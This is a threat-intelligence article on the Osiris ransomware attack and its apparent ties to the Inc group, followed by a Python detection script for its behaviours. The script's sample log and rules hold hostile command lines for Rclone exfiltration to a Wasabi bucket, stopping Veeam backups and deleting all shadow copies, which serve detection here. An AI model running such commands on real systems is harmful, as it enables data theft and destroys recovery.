The cybersecurity landscape was jolted in late 2025 by a meticulously executed attack against a major food service franchisee in Southeast Asia, an incident that served as the global introduction to a new and highly capable ransomware family named Osiris. While its name might evoke a passing memory of a 2016 Locky variant, extensive analysis has definitively shown that this new incarnation is an entirely separate and far more advanced threat. The attack was not merely the deployment of a new encryption tool but a showcase of the refined tactics, techniques, and procedures of a mature and methodical threat actor. Although the identities of the developers behind Osiris remain shrouded in mystery, the digital breadcrumbs left behind point to a strong operational overlap with the notorious Inc ransomware group, suggesting the emergence of a formidable new player with a veteran’s playbook. This debut has raised critical questions about the evolution of established cybercrime syndicates and the continuous refinement of their attack methodologies.
A Masterclass in Covert Operations
The defining characteristic of the Osiris incident is not the novelty of its payload but the sophistication of the group wielding it. The attackers demonstrated a deep understanding of modern enterprise networks, relying heavily on “living off the land” techniques that use legitimate and dual-use tools to navigate the victim’s environment. This approach allows them to blend seamlessly with normal administrative activity, significantly delaying detection and giving them ample time to conduct thorough reconnaissance. A central theme of the campaign was the patient and systematic dismantling of the victim’s security posture, a process that unfolded over several days before any files were encrypted. This methodical compromise culminated in a Bring-Your-Own-Vulnerable-Driver (BYOVD) attack, a sophisticated technique used to disable security solutions at the kernel level. This focus on deep network infiltration and defense evasion is a clear hallmark of an experienced and disciplined adversary, likely an offshoot of an existing group or a highly skilled affiliate that has chosen to adopt a new brand.
The operational playbook used in the attack provides compelling evidence linking the operators to the Inc ransomware group. The intrusion began with a prolonged data exfiltration phase, a critical component of the double-extortion tactics favored by top-tier ransomware gangs. Several days before deploying the ransomware, the attackers used Rclone, a legitimate command-line utility for managing cloud data, to steal vast quantities of sensitive information. This stolen data was then staged in cloud storage buckets hosted by Wasabi. The specific choice of Wasabi for data exfiltration is a significant behavioral link, as this exact TTP was previously observed in attacks attributed to the Inc ransomware group in October 2025. Furthermore, for credential theft, the attackers deployed a version of the popular tool Mimikatz, executing it under the specific filename kaz.exe. This precise filename has been documented in prior Inc ransomware incidents, serving as another strong indicator of a direct crossover in personnel, tools, or both.
Deconstructing the Digital Weapon
A cornerstone of the attackers’ strategy was the calculated takedown of the victim’s defenses, a task executed with precision and technical prowess. The operators employed a malicious driver known as Poortry in a sophisticated BYOVD attack. This driver, cleverly disguised as a legitimate Malwarebytes anti-exploit driver, was loaded onto target systems. By exploiting a vulnerability within it, the attackers gained kernel-level privileges, which granted them the authority to terminate any running process, including advanced endpoint detection and response (EDR) and antivirus (AV) solutions that are typically protected from user-level interference. The use of Poortry is particularly notable because, unlike many drivers used in BYOVD attacks that are legitimate but vulnerable third-party products, Poortry appears to be a custom-developed malicious driver that its creators successfully passed through a legitimate digital signing process. This advanced defense evasion technique underscores the group’s high level of capability and resources.
The Osiris ransomware payload itself is an effective and feature-rich tool engineered for speed and devastating impact. It utilizes a robust hybrid encryption scheme, combining the efficiency of the AES-128 symmetric cipher in Counter mode with the security of Elliptic Curve Cryptography for key protection. To maximize performance and encrypt a large number of files rapidly, the malware leverages Windows I/O Completion Ports to manage asynchronous file I/O requests. This allows for highly parallelized and efficient encryption operations. The ransomware also offers its operators granular control through several command-line arguments. These options allow the attacker to target a single file or an entire directory, write a log of its activities, and even manage the shutdown and encryption of Hyper-V virtual machines. This level of control demonstrates that the payload was designed not just for destruction, but for precise and adaptable deployment within complex enterprise environments.
To ensure the victim’s system remains operational enough to facilitate a ransom payment while maximizing damage to valuable data, Osiris is configured with specific targeting and exclusion rules. It is programmed to skip the encryption of critical system files such as .exe, .dll, and .sys, as well as essential operating system folders like windows and $recycle.bin. This prevents the system from becoming unbootable. However, it does not fully spare directories like program files, suggesting a deliberate intent to corrupt installed applications and disrupt business workflows. Before and during the encryption process, Osiris actively cripples the system’s recovery capabilities. It terminates a long list of processes related to databases, productivity software, and system utilities, and it stops critical services, particularly those related to backups like the Volume Shadow Copy Service (VSS) and various Veeam services. Once encryption is complete, it executes native Windows commands to delete all volume shadow copies, eliminating the most common method for quick file restoration.
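Detection logic for the behavioral indicators described in the exfiltration passage and in the recovery-sabotage passage above (Rclone staging to Wasabi, Mimikatz running as kaz.exe, backup service stops, shadow copy deletion), as an added example that is not part of the original report. It runs over constructed process-creation records; the Wasabi endpoint domain (wasabisys.com), the Veeam service name and the exact shadow-copy deletion command lines are assumptions, since the report does not name them.

```python
import json
import re

# Each rule pairs executable name(s) with a command-line pattern; both must match.
# kaz.exe, Rclone, Wasabi, VSS and Veeam come from the report; the rest is assumed.
RULES = [
    ("rclone_to_wasabi", "rclone", r"wasabisys\.com|wasabi"),            # assumed endpoint domain
    ("mimikatz_as_kaz_exe", "kaz", r".*"),                               # filename from the report
    ("shadow_copy_deletion", "vssadmin|wmic", r"delete\s+shadows|shadowcopy\s+delete"),  # assumed
    ("backup_service_stop", "sc|net", r"\bstop\b.*(vss|veeam)"),        # VSS / Veeam service stops
]

def _image_matches(image: str, names: str) -> bool:
    """True when the executable's file name is one of `names`, with or without .exe."""
    return re.search(rf"(^|\\)({names})(\.exe)?$", image, re.I) is not None

def classify(record: dict) -> list[str]:
    """Return the names of all rules that match one process-creation record."""
    image = record.get("Image", "")
    cmd = record.get("CommandLine", "")
    return [name for name, names, cmd_re in RULES
            if _image_matches(image, names) and re.search(cmd_re, cmd, re.I)]

def scan(log_lines: list[str]) -> dict[str, list[str]]:
    """Map each rule that fired to the hosts it fired on, in first-seen order."""
    findings: dict[str, list[str]] = {}
    for line in log_lines:
        rec = json.loads(line)
        for name in classify(rec):
            hosts = findings.setdefault(name, [])
            if rec["Computer"] not in hosts:
                hosts.append(rec["Computer"])
    return findings

# Constructed sample telemetry (one JSON record per line); hosts and paths are invented.
SAMPLE_LOG = [
    r'{"Computer":"FS01","Image":"C:\\Tools\\rclone.exe","CommandLine":"rclone copy D:\\Finance wasabi:exfil-bucket --s3-endpoint s3.wasabisys.com"}',
    r'{"Computer":"DC01","Image":"C:\\Users\\admin\\Desktop\\kaz.exe","CommandLine":"kaz.exe"}',
    r'{"Computer":"FS01","Image":"C:\\Windows\\System32\\net.exe","CommandLine":"net stop VeeamBackupSvc"}',
    r'{"Computer":"FS01","Image":"C:\\Windows\\System32\\vssadmin.exe","CommandLine":"vssadmin delete shadows /all /quiet"}',
    r'{"Computer":"WS07","Image":"C:\\Windows\\System32\\svchost.exe","CommandLine":"svchost.exe -k netsvcs"}',
    r'{"Computer":"WS07","Image":"C:\\Windows\\System32\\net.exe","CommandLine":"net use Z: \\\\fs01\\share"}',
]

if __name__ == "__main__":
    for rule, hosts in scan(SAMPLE_LOG).items():
        print(f"{rule}: {', '.join(hosts)}")
```

The two WS07 records are benign controls: svchost does not match the sc/net image rule, and a `net use` command carries no `stop`, so neither fires.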
An Evolved and Formidable Threat
The emergence of the Osiris ransomware marked a significant development in the threat landscape. The analysis of its debut attack revealed that while the encryption payload was new, it was wielded by a highly skilled and experienced adversary employing a refined and ruthlessly effective methodology. The substantial overlaps in tactics, techniques, and procedures with the Inc ransomware group, particularly the use of Wasabi for data exfiltration and the specific kaz.exe filename for Mimikatz, suggested a direct link between the two operations. This connection pointed toward the evolution of an existing cybercrime entity, possibly indicating that a former affiliate or developer from the Inc ecosystem was now operating under a new banner with an upgraded toolset. The use of advanced defense evasion techniques, exemplified by the deployment of the Poortry driver in a sophisticated BYOVD attack, further underscored the formidable capabilities of these threat actors. The ultimate impact of Osiris will depend on its future proliferation, but its first appearance demonstrated that it is a potent weapon in the hands of a capable and dangerous adversary.
